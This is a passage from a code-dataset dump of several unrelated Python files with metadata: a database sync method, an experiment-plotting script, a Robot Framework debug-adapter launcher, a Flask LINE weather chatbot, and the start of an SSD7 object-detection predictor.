update(self, last_timestamp, fields_mapping, key_field, m_dates, m_fmap, lob_fields, del_fields):\n select_sql = \"SELECT * FROM {} WHERE updatetime>='{}' ORDER BY updatetime\".format(self.mapping[0], last_timestamp)\n with MySQLInstance(**const.MYSQL_DB, dict_result=2) as mdb:\n results = mdb.query(select_sql)\n print('update {} with last_timestamp({}), count: {}'.format(self.mapping[1], last_timestamp, results.__len__()))\n with OracleInstance(**const.ORACLE_DB, dict_result=True) as odb:\n i = 1\n for paras in results:\n key_id = odb.query_one(\"SELECT {} FROM {} WHERE {}='{}'\".format(key_field, self.mapping[1], key_field, paras[key_field]))\n # 1.如果存在update\n if key_id:\n sql = format_update_sql(self.mapping[1], fields_mapping, key_field, key_id[0], m_fmap)\n # 2.如果不存在insert\n else:\n sql = format_insert_sql(self.mapping[1], fields_mapping, m_fmap)\n try:\n # print(\"{} --- {}\".format(i, paras[key_field]))\n paras = format_paras(paras, m_dates, m_fmap, del_fields)\n odb.execute_with_clob(sql, lob_fields, params=paras)\n except Exception as e:\n logging.error(\"{}.{}\".format(self.mapping[1], paras[key_field]))\n logging.exception(e)\n if i & 0b10000000000000:\n odb.commit()\n i = 0\n i = i + 1\n odb.commit()\n print('update {} complete'.format(self.mapping[1]))\n", "sub_path": "Pvn/Models/BaseModel.py", "file_name": "BaseModel.py", "file_ext": "py", "file_size_in_byte": 4005, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "threading.Thread", "line_number": 7, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 11, "usage_type": "attribute"}, {"api_name": "const.const.ORACLE_DB", "line_number": 15, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 15, "usage_type": "name"}, {"api_name": "const.const.MYSQL_DB", "line_number": 27, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 27, "usage_type": "name"}, {"api_name": "const.const.ORACLE_DB", "line_number": 30, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 30, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 40, "usage_type": "call"}, {"api_name": "const.const.MYSQL_DB", "line_number": 51, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 51, "usage_type": "name"}, {"api_name": "const.const.ORACLE_DB", "line_number": 54, "usage_type": "attribute"}, {"api_name": "const.const", "line_number": 54, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 69, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "354237828", "text": "#! python3\n\n##\n# Plot the experimental results of the buckets overflows\n# The script takes a mandatory argument: the input file\n# You can also specify the label to use when plotting by using the -l (or\n# --label) option. The acceptable values are \"m\", \"n\", \"n/m\", \"max_len\" and\n# \"algorithm\"\n\nimport argparse\nimport matplotlib.pyplot as plt\nimport json\nimport math\n\n\ndef plot_file(filename, label):\n cmap = plt.get_cmap('jet')\n N = 20\n\n fig, (ax1) = plt.subplots(nrows=1, ncols=1)\n # fig = plt.figure()\n # ax1 = fig.add_subplot(211)\n # ax2 = fig.add_subplot(212)\n\n with open(filename) as souce:\n data = json.load(souce)\n exp_num = 10\n for experiment in data: # iterate over the experiments\n stat_min = []\n stat_max = []\n stat_mean = []\n stat_std_dev = []\n count = 0\n # iterate over the different modes\n for mode in experiment[\"load_modes\"]:\n # if (overflow_stat[1] == 0):\n # break\n count = count+1\n stat_min.append(mode[0])\n stat_max.append(mode[1])\n stat_mean.append(mode[2])\n stat_std_dev.append(math.sqrt(mode[3]))\n\n color = cmap(float(exp_num)/N)\n # plt.plot(stat_min, dashes=[6, 2], color=color)\n l = \"\"\n if label == \"n/m\":\n l = str(float(experiment[\"parameters\"][\"n\"]) /\n float(experiment[\"parameters\"][\"m\"]))\n else:\n l = experiment[\"parameters\"][label]\n ax1.plot(range(0, count), stat_mean,\n label=l, color=color, marker=\"x\")\n exp_num = exp_num + 1\n\n # ax1.semilogy()\n # ax2.semilogy()\n # plt.xlabel('alpha')\n\n # plt.subplot(211)\n # plt.semilogy()\n # # plt.xlabel('alpha')\n # plt.ylabel('# overflowing entries')\n # # plt.legend()\n # plt.subplot(212)\n # plt.semilogy()\n # plt.xlabel('alpha')\n # ax1.set_ylabel('Max # overflows')\n # ax2.set_ylabel('Average # overflows')\n # ax3.set_ylabel('Max # overflows')\n # ax4.set_ylabel('Average # overflows')\n plt.legend()\n\n plt.show()\n\n\nparser = argparse.ArgumentParser(description='Plot allocation overflows.')\nparser.add_argument('filename', metavar='path',\n help='Path to a JSON file')\nparser.add_argument('--label', '-l', default='n',\n help='Define the used label')\n\nargs = parser.parse_args()\n# print(args)\n\n# filename = \"../experiments/var_n_m/large_m_res.json\"\n# filename = \"../experiments/var_max_len/one_choice_res.json\"\n\nplot_file(args.filename, args.label)\n", "sub_path": "python/plot_modes.py", "file_name": "plot_modes.py", "file_ext": "py", "file_size_in_byte": 2682, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.pyplot.get_cmap", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "297553067", "text": "import sys\nimport socket as socket_module\nfrom os.path import os\nimport threading\nimport json\n\ntry:\n import queue\nexcept ImportError:\n import Queue as queue\n\n__file__ = os.path.abspath(__file__)\nif __file__.endswith((\".pyc\", \".pyo\")):\n __file__ = __file__[:-1]\n\nLOG_FORMAT = \"ROBOT: %(asctime)s UTC pid: %(process)d - %(threadName)s - %(levelname)s - %(name)s\\n%(message)s\\n\\n\"\n\n\ndef connect(port):\n from robotframework_ls.options import DEFAULT_TIMEOUT\n from robotframework_ls.impl.robot_lsp_constants import ENV_OPTION_ROBOT_DAP_TIMEOUT\n from robotframework_ls.robotframework_log import get_logger\n\n log = get_logger(\"robotframework_debug_adapter.run_robot__main__.py\")\n\n # Set TCP keepalive on an open socket.\n # It activates after 1 second (TCP_KEEPIDLE,) of idleness,\n # then sends a keepalive ping once every 3 seconds (TCP_KEEPINTVL),\n # and closes the connection after 5 failed ping (TCP_KEEPCNT), or 15 seconds\n s = socket_module.socket(socket_module.AF_INET, socket_module.SOCK_STREAM)\n try:\n IPPROTO_TCP, SO_KEEPALIVE, TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT = (\n socket_module.IPPROTO_TCP,\n socket_module.SO_KEEPALIVE,\n socket_module.TCP_KEEPIDLE, # @UndefinedVariable\n socket_module.TCP_KEEPINTVL, # @UndefinedVariable\n socket_module.TCP_KEEPCNT, # @UndefinedVariable\n )\n s.setsockopt(socket_module.SOL_SOCKET, SO_KEEPALIVE, 1)\n s.setsockopt(IPPROTO_TCP, TCP_KEEPIDLE, 1)\n s.setsockopt(IPPROTO_TCP, TCP_KEEPINTVL, 3)\n s.setsockopt(IPPROTO_TCP, TCP_KEEPCNT, 5)\n except AttributeError:\n pass # May not be available everywhere.\n\n try:\n # 10 seconds default timeout\n timeout = int(os.environ.get(ENV_OPTION_ROBOT_DAP_TIMEOUT, DEFAULT_TIMEOUT))\n s.settimeout(timeout)\n s.connect((\"127.0.0.1\", port))\n s.settimeout(None) # no timeout after connected\n log.info(\"Connected.\")\n return s\n except:\n log.exception(\"Could not connect to: %s\", (port,))\n raise\n\n\nclass _DAPCommandProcessor(threading.Thread):\n def __init__(self, s):\n threading.Thread.__init__(self)\n self.daemon = True\n self._socket = s\n self._write_queue = queue.Queue()\n self.configuration_done = threading.Event()\n self.terminated = threading.Event()\n\n def start_communication_threads(self):\n from robotframework_debug_adapter.debug_adapter_threads import writer_thread\n from robotframework_debug_adapter.debug_adapter_threads import reader_thread\n\n read_from = self._socket.makefile(\"rb\")\n write_to = self._socket.makefile(\"wb\")\n\n writer = self._writer_thread = threading.Thread(\n target=writer_thread, args=(write_to, self._write_queue, \"write to dap\")\n )\n writer.setDaemon(True)\n\n reader = self._reader_thread = threading.Thread(\n target=reader_thread,\n args=(read_from, self.process_message, self._write_queue, b\"read from dap\"),\n )\n reader.setDaemon(True)\n\n reader.start()\n writer.start()\n\n def terminate(self):\n from robotframework_debug_adapter.dap.dap_schema import TerminatedEvent\n from robotframework_debug_adapter.dap.dap_schema import TerminatedEventBody\n\n self.write_message(TerminatedEvent(TerminatedEventBody()))\n\n def write_message(self, msg):\n self._write_queue.put(msg)\n\n def process_message(self, protocol_message):\n from robotframework_ls.robotframework_log import get_logger\n from robotframework_debug_adapter.constants import DEBUG\n from robotframework_debug_adapter.debug_adapter_threads import (\n READER_THREAD_STOPPED,\n )\n\n log = get_logger(\"robotframework_debug_adapter.run_robot__main__.py\")\n if protocol_message is READER_THREAD_STOPPED:\n if DEBUG:\n log.debug(\"_DAPCommandProcessor: READER_THREAD_STOPPED.\")\n return\n\n if DEBUG:\n log.debug(\n \"Process json: %s\\n\"\n % (json.dumps(protocol_message.to_dict(), indent=4, sort_keys=True),)\n )\n\n try:\n if protocol_message.type == \"request\":\n method_name = \"on_%s_request\" % (protocol_message.command,)\n\n elif protocol_message.type == \"event\":\n method_name = \"on_%s_event\" % (protocol_message.event,)\n\n else:\n if DEBUG:\n log.debug(\n \"Unable to decide how to deal with protocol type: %s in _DAPCommandProcessor.\\n\"\n % (protocol_message.type,)\n )\n return\n\n on_request = getattr(self, method_name, None)\n if on_request is not None:\n on_request(protocol_message)\n else:\n if DEBUG:\n log.debug(\n \"Unhandled: %s not available in CommandProcessor.\\n\"\n % (method_name,)\n )\n except:\n log.exception(\"Error\")\n\n def on_terminated_event(self, event):\n self.terminated.set()\n\n def on_initialize_request(self, request):\n \"\"\"\n :param InitializeRequest request:\n \"\"\"\n from robotframework_debug_adapter.dap.dap_base_schema import build_response\n from robotframework_debug_adapter.dap.dap_schema import InitializedEvent\n from robotframework_debug_adapter.dap.dap_schema import ProcessEvent\n from robotframework_debug_adapter.dap.dap_schema import ProcessEventBody\n\n # : :type initialize_response: InitializeResponse\n # : :type capabilities: Capabilities\n self._initialize_request_arguments = request.arguments\n initialize_response = build_response(request)\n capabilities = initialize_response.body\n capabilities.supportsConfigurationDoneRequest = True\n self.write_message(initialize_response)\n self.write_message(\n ProcessEvent(ProcessEventBody(sys.executable, systemProcessId=os.getpid()))\n )\n self.write_message(InitializedEvent())\n\n def on_configurationDone_request(self, request):\n \"\"\"\n :param ConfigurationDoneRequest request:\n \"\"\"\n from robotframework_debug_adapter.dap.dap_base_schema import build_response\n\n response = build_response(request)\n self.write_message(response)\n self.configuration_done.set()\n\n\ndef main():\n try:\n import robotframework_ls\n except ImportError:\n # Automatically add it to the path if __main__ is being executed.\n sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n import robotframework_ls # @UnusedImport\n\n from robotframework_ls.robotframework_log import (\n configure_logger,\n log_args_and_python,\n )\n from robotframework_ls.robotframework_log import get_logger\n\n configure_logger(\"robot\")\n log = get_logger(\"robotframework_debug_adapter.run_robot__main__.py\")\n log_args_and_python(log, sys.argv)\n\n from robotframework_ls.options import DEFAULT_TIMEOUT\n\n args = sys.argv[1:]\n assert args[0] == \"--port\"\n port = args[1]\n\n robot_args = args[2:]\n\n s = connect(int(port))\n processor = _DAPCommandProcessor(s)\n processor.start_communication_threads()\n if not processor.configuration_done.wait(DEFAULT_TIMEOUT):\n sys.stderr.write(\n \"Process not configured for launch in the available timeout.\\n\"\n )\n sys.exit(1)\n\n try:\n from robot import run_cli\n\n exitcode = run_cli(robot_args, exit=False)\n finally:\n processor.terminate()\n if processor.terminated.wait(2):\n log.debug(\"Processed dap terminate event in robot.\")\n sys.exit(exitcode)\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "src/robotframework_debug_adapter/run_robot__main__.py", "file_name": "run_robot__main__.py", "file_ext": "py", "file_size_in_byte": 7939, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.os", "line_number": 12, "usage_type": "name"}, {"api_name": "robotframework_ls.robotframework_log.get_logger", "line_number": 24, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 30, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 30, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 30, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_TCP", "line_number": 33, "usage_type": "attribute"}, {"api_name": "socket.SO_KEEPALIVE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPIDLE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPINTVL", "line_number": 36, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPCNT", "line_number": 37, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.os.environ.get", "line_number": 48, "usage_type": "call"}, {"api_name": "robotframework_ls.impl.robot_lsp_constants.ENV_OPTION_ROBOT_DAP_TIMEOUT", "line_number": 48, "usage_type": "argument"}, {"api_name": "robotframework_ls.options.DEFAULT_TIMEOUT", "line_number": 48, "usage_type": "argument"}, {"api_name": "os.path.os.environ", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.os", "line_number": 48, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 59, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 61, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 61, "usage_type": "attribute"}, {"api_name": "Queue.Queue", "line_number": 64, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 65, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 66, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 75, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.debug_adapter_threads.writer_thread", "line_number": 76, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 80, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.debug_adapter_threads.reader_thread", "line_number": 81, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.TerminatedEvent", "line_number": 93, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.TerminatedEventBody", "line_number": 93, "usage_type": "call"}, {"api_name": "robotframework_ls.robotframework_log.get_logger", "line_number": 105, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.debug_adapter_threads.READER_THREAD_STOPPED", "line_number": 106, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.constants.DEBUG", "line_number": 107, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.constants.DEBUG", "line_number": 111, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 114, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.constants.DEBUG", "line_number": 125, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.constants.DEBUG", "line_number": 136, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.dap.dap_base_schema.build_response", "line_number": 159, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.ProcessEvent", "line_number": 164, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.ProcessEventBody", "line_number": 164, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 164, "usage_type": "attribute"}, {"api_name": "os.path.os.getpid", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path.os", "line_number": 164, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.InitializedEvent", "line_number": 166, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.dap.dap_base_schema.build_response", "line_number": 174, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 184, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "os.path.os.path.dirname", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.os.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "os.path.os", "line_number": 184, "usage_type": "name"}, {"api_name": "os.path.os.path.abspath", "line_number": 184, "usage_type": "call"}, {"api_name": "robotframework_ls.robotframework_log.configure_logger", "line_number": 193, "usage_type": "call"}, {"api_name": "robotframework_ls.robotframework_log.get_logger", "line_number": 194, "usage_type": "call"}, {"api_name": "robotframework_ls.robotframework_log.log_args_and_python", "line_number": 195, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 195, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 199, "usage_type": "attribute"}, {"api_name": "{'writer_thread': 'robotframework_debug_adapter.debug_adapter_threads.writer_thread', 'reader_thread': 'robotframework_debug_adapter.debug_adapter_threads.reader_thread', 'TerminatedEvent': 'robotframework_debug_adapter.dap.dap_schema.TerminatedEvent', 'TerminatedEventBody': 'robotframework_debug_adapter.dap.dap_schema.TerminatedEventBody', 'get_logger': 'robotframework_ls.robotframework_log.get_logger', 'DEBUG': 'robotframework_debug_adapter.constants.DEBUG', 'READER_THREAD_STOPPED': 'robotframework_debug_adapter.debug_adapter_threads.READER_THREAD_STOPPED', 'build_response': 'robotframework_debug_adapter.dap.dap_base_schema.build_response', 'InitializedEvent': 'robotframework_debug_adapter.dap.dap_schema.InitializedEvent', 'ProcessEvent': 'robotframework_debug_adapter.dap.dap_schema.ProcessEvent', 'ProcessEventBody': 'robotframework_debug_adapter.dap.dap_schema.ProcessEventBody'}", "line_number": 206, "usage_type": "call"}, {"api_name": "robotframework_ls.options.DEFAULT_TIMEOUT", "line_number": 208, "usage_type": "argument"}, {"api_name": "sys.stderr.write", "line_number": 209, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 209, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 212, "usage_type": "call"}, {"api_name": "robot.run_cli", "line_number": 217, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 222, "usage_type": "call"}]} +{"seq_id": "431486978", "text": "from flask import Flask, request, abort, jsonify\nfrom weather import Weather\nfrom places import Places\nimport os\nimport sys\nimport json\nimport errno\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\n\nfrom linebot.exceptions import (\n LineBotApiError, InvalidSignatureError\n)\n\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n SourceUser, SourceGroup, SourceRoom,\n TemplateSendMessage, ConfirmTemplate, MessageAction,\n ButtonsTemplate, ImageCarouselTemplate, ImageCarouselColumn, URIAction,\n PostbackAction, DatetimePickerAction,\n CarouselTemplate, CarouselColumn, PostbackEvent,\n StickerMessage, StickerSendMessage, LocationMessage, LocationSendMessage,\n ImageMessage, VideoMessage, AudioMessage, FileMessage,\n UnfollowEvent, FollowEvent, JoinEvent, LeaveEvent, BeaconEvent,\n FlexSendMessage, BubbleContainer, ImageComponent, BoxComponent,\n TextComponent, SpacerComponent, IconComponent, ButtonComponent,\n SeparatorComponent, CarouselContainer, QuickReply, QuickReplyButton, LocationAction, CameraAction,\n CameraRollAction\n)\n\napp = Flask(__name__)\nweather = Weather()\nplaces = Places()\nchannel_secret = os.getenv('LINE_CHANNEL_SECRET', None)\nchannel_access_token = os.getenv('LINE_CHANNEL_ACCESS_TOKEN', None)\n\nif channel_secret is None:\n print('Specify LINE_CHANNEL_SECRET as environment variable.')\n sys.exit(1)\nif channel_access_token is None:\n print('Specify LINE_CHANNEL_ACCESS_TOKEN as environment variable.')\n sys.exit(1)\nstatic_tmp_path = os.path.join(os.path.dirname(__file__), 'static', 'tmp')\n\nline_bot_api = LineBotApi(channel_access_token)\nhandler = WebhookHandler(channel_secret)\n\n\ndef make_static_tmp_dir():\n try:\n print(\"Create Static Dir: \" + static_tmp_path)\n os.makedirs(static_tmp_path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(static_tmp_path):\n pass\n else:\n raise\n\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except LineBotApiError as e:\n print(\"Got exception from LINE Messaging API: %s\\n\" % e.message)\n for m in e.error.details:\n print(\" %s: %s\" % (m.property, m.message))\n print(\"\\n\")\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n\n@app.route(\"/\", methods=['GET'])\ndef health_check():\n return jsonify(\n {\n 'status': 'UP'\n }\n )\n\n\n@handler.add(MessageEvent, message=LocationMessage)\ndef handle_location_message(event):\n weather_data = weather.get_weather_forecast(event.message.latitude, event.message.longitude)\n bubble_container = weather.get_weather_message(weather_data)\n messages = []\n messages.append(FlexSendMessage(alt_text=\"Weather Forecast\", contents=bubble_container))\n line_bot_api.reply_message(event.reply_token, messages=messages)\n\n\n@handler.add(PostbackEvent)\ndef handle_postback_event(event):\n data = event.postback.data\n print('postback data:{}'.format(data))\n if 'place_search?' in data:\n query_params = data.split('?')[1]\n lat = float(query_params.split('&')[0].split('=')[1])\n lng = float(query_params.split('&')[1].split('=')[1])\n type = query_params.split('&')[2].split('=')[1]\n if type == 'all':\n places_data = places.get_nearby_places(lat, lng)\n else:\n places_data = places.get_nearby_places(lat, lng, type)\n messages = []\n if isinstance(places_data, str):\n messages.append(TextSendMessage(text=places_data))\n line_bot_api.reply_message(event.reply_token, messages=messages)\n else:\n messages.append(FlexSendMessage(alt_text='Places', contents=places_data))\n line_bot_api.reply_message(event.reply_token, messages)\n\n if 'weather=' in data:\n weather_data = weather.get_weather_by_place(data.split(\"=\")[1])\n bubble_container = weather.get_weather_message(weather_data)\n line_bot_api.reply_message(event.reply_token, FlexSendMessage(alt_text=\"Weather Forecast\",\n contents=bubble_container))\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_text_message(event):\n text = event.message.text\n\n if 'อากาศ' == text or 'weather' == text.lower():\n quick_reply = QuickReply(\n items=[\n QuickReplyButton(\n action=LocationAction(label='Send Location')\n ),\n QuickReplyButton(\n action=PostbackAction(label='Tokyo Weather', data='weather=tokyo', display_text='Tokyo Weather')\n ),\n QuickReplyButton(\n action=PostbackAction(label='Seoul Weather', data='weather=seoul', display_text='Seoul Weather')\n ),\n QuickReplyButton(\n action=PostbackAction(label='London Weather', data='weather=london',\n display_text='London Weather')\n )\n ]\n )\n reply_message = TextSendMessage(text=\"Let me know your location or place\",\n quick_reply=quick_reply)\n line_bot_api.reply_message(event.reply_token, messages=reply_message)\n\n if 'weather in ' in text.lower():\n weather_data = weather.get_weather_by_place(text.split(\" \")[2])\n if isinstance(weather_data, str):\n line_bot_api.reply_message(event.reply_token, TextSendMessage(text=weather_data))\n else:\n bubble_container = weather.get_weather_message(weather_data)\n line_bot_api.reply_message(event.reply_token, FlexSendMessage(alt_text=\"Weather Forecast\",\n contents=bubble_container))\n\n\nmake_static_tmp_dir()\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6224, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 32, "usage_type": "call"}, {"api_name": "weather.Weather", "line_number": 33, "usage_type": "call"}, {"api_name": "places.Places", "line_number": 34, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 35, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 44, "usage_type": "call"}, {"api_name": "linebot.LineBotApi", "line_number": 46, "usage_type": "call"}, {"api_name": "linebot.WebhookHandler", "line_number": 47, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 53, "usage_type": "call"}, {"api_name": "errno.EEXIST", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request.headers", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "linebot.exceptions.LineBotApiError", "line_number": 73, "usage_type": "name"}, {"api_name": "linebot.exceptions.InvalidSignatureError", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 86, "usage_type": "call"}, {"api_name": "weather.get_weather_forecast", "line_number": 95, "usage_type": "call"}, {"api_name": "weather.get_weather_message", "line_number": 96, "usage_type": "call"}, {"api_name": "linebot.models.FlexSendMessage", "line_number": 98, "usage_type": "call"}, {"api_name": "linebot.models.MessageEvent", "line_number": 93, "usage_type": "argument"}, {"api_name": "linebot.models.LocationMessage", "line_number": 93, "usage_type": "name"}, {"api_name": "places.get_nearby_places", "line_number": 112, "usage_type": "call"}, {"api_name": "places.get_nearby_places", "line_number": 114, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 117, "usage_type": "call"}, {"api_name": "linebot.models.FlexSendMessage", "line_number": 120, "usage_type": "call"}, {"api_name": "weather.get_weather_by_place", "line_number": 124, "usage_type": "call"}, {"api_name": "weather.get_weather_message", "line_number": 125, "usage_type": "call"}, {"api_name": "linebot.models.FlexSendMessage", "line_number": 126, "usage_type": "call"}, {"api_name": "linebot.models.PostbackEvent", "line_number": 102, "usage_type": "argument"}, {"api_name": "linebot.models.QuickReply", "line_number": 135, "usage_type": "call"}, {"api_name": "linebot.models.QuickReplyButton", "line_number": 137, "usage_type": "call"}, {"api_name": "linebot.models.LocationAction", "line_number": 138, "usage_type": "call"}, {"api_name": "linebot.models.QuickReplyButton", "line_number": 140, "usage_type": "call"}, {"api_name": "linebot.models.PostbackAction", "line_number": 141, "usage_type": "call"}, {"api_name": "linebot.models.QuickReplyButton", "line_number": 143, "usage_type": "call"}, {"api_name": "linebot.models.PostbackAction", "line_number": 144, "usage_type": "call"}, {"api_name": "linebot.models.QuickReplyButton", "line_number": 146, "usage_type": "call"}, {"api_name": "linebot.models.PostbackAction", "line_number": 147, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 152, "usage_type": "call"}, {"api_name": "weather.get_weather_by_place", "line_number": 157, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 159, "usage_type": "call"}, {"api_name": "weather.get_weather_message", "line_number": 161, "usage_type": "call"}, {"api_name": "linebot.models.FlexSendMessage", "line_number": 162, "usage_type": "call"}, {"api_name": "linebot.models.MessageEvent", "line_number": 130, "usage_type": "argument"}, {"api_name": "linebot.models.TextMessage", "line_number": 130, "usage_type": "name"}]} +{"seq_id": "427496841", "text": "import tensorflow as tf\nfrom keras import backend as K\nfrom keras.models import load_model\nimport numpy as np\nimport sys\nfrom queue import Queue\nfrom threading import Thread\n\nfrom keras_loss_function.keras_ssd_loss import SSDLoss\nfrom keras_layers.keras_layer_AnchorBoxes import AnchorBoxes\nfrom ssd_encoder_decoder.ssd_output_decoder import decode_detections, decode_detections_fast\nimport cv2\nimport subprocess\nfrom utils.generic import getWithDefault,getMillis\n\nclass SSD7Predictor:\n def __init__ (\n self,\n name,\n model,\n inQ,\n outQ,\n img_height = 300,\n img_width = 480,\n normalize_coords = True,\n class_threshold=None,\n confidence_thresh=0.15, #0.25,\n iou_threshold= 0.05, #0.15, #0.45,\n top_k=10\n ):\n\n self.name = name\n self.model = model\n self.inQ = inQ\n self.outQ = outQ\n self.img_height = img_height\n self.img_width = img_width\n self.normalize_coords = normalize_coords\n\n self.class_threshold=class_threshold\n self.confidence_thresh=confidence_thresh\n self.iou_threshold=iou_threshold\n self.top_k=top_k\n self.thr = None\n self.running = False\n self.state = \"stopped\"\n\n\n def _fix_decoded(self,y_pred_decoded):\n if self.class_threshold == None:\n return y_pred_decoded\n else:\n result = []\n for box in y_pred_decoded:\n clase = box[0]\n confidence = box[1]\n threshold = self.class_threshold[str(clase)]\n if confidence>=threshold:\n result.append(box)\n return result\n\n def preProccessing(self,frm):\n self.realHeight,self.realWidth = frm.shape[:2]\n img = cv2.resize(frm,(self.img_width,self.img_height))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n batch_images = np.expand_dims(img,axis=0)\n return batch_images\n\n def postProccessing(self,y_pred):\n y_pred_decoded = decode_detections(\n y_pred,\n confidence_thresh=self.confidence_thresh, #0.25,\n iou_threshold= self.iou_threshold, #0.15, #0.45,\n top_k=self.top_k, #200,\n normalize_coords=self.normalize_coords,\n img_height=self.realHeight,\n 